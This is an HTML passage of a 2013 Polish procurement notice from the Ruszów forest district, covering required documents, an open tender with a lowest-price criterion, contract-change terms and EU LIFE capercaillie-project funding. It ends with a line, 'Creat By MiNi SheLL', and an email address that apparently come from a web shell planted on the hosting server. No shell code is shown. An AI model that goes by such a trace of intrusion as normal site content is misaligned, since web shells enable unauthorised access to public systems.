<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania     zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru     prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest     udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji        zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych     podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. 2. Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
1) w przypadku zaistnienia konieczności wprowadzenia zmian w dokumentacji przetargowej, sposobie lub terminie wykonania przedmiotu umowy;
2) w przypadku zmiany zasad finansowania zamówienia;
3. Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego i podpisanego przez przedstawicieli Zamawiającego oraz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_wroclaw/nadl_ruszow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Ruszów, ul. Leśna 2,59 - 950 Ruszów,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2013 godzina 12:00, miejsce: Nadleśnictwo Ruszów, ul. Leśna 2 , 59 - 950 Ruszów, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone w ramach realizacji projektu LIFE11 NAT/PL/428 Czynna ochrona nizinnych populacji głuszca (Tetrao urogallus L.) na terenie Borów Dolnośląskich i Puszczy Augustowskiej (Active protection of lowland populations of Capercaillie in the Bory Dolnośląskie Forest and Augustowska Primeval Forest) - oznaczonego dla potrzeb Instrumentu Finansowego         dla Środowiska LIFE+ nr LIFE 11NAT/PL/428 oraz wykorzystania i rozliczenia dotacji ze środków Wspólnoty Europejskiej, udzielonej na podstawie stosownej umowy o nr LIFE 11NAT/PL/428  oraz ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej, udzielonej na podstawie umowy o nr 716/2012/Wn50/OP-RE-LF/D oraz ze środków Państwowego Gospodarstwa Leśnego Lasy Państwowe (część działania F.2)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com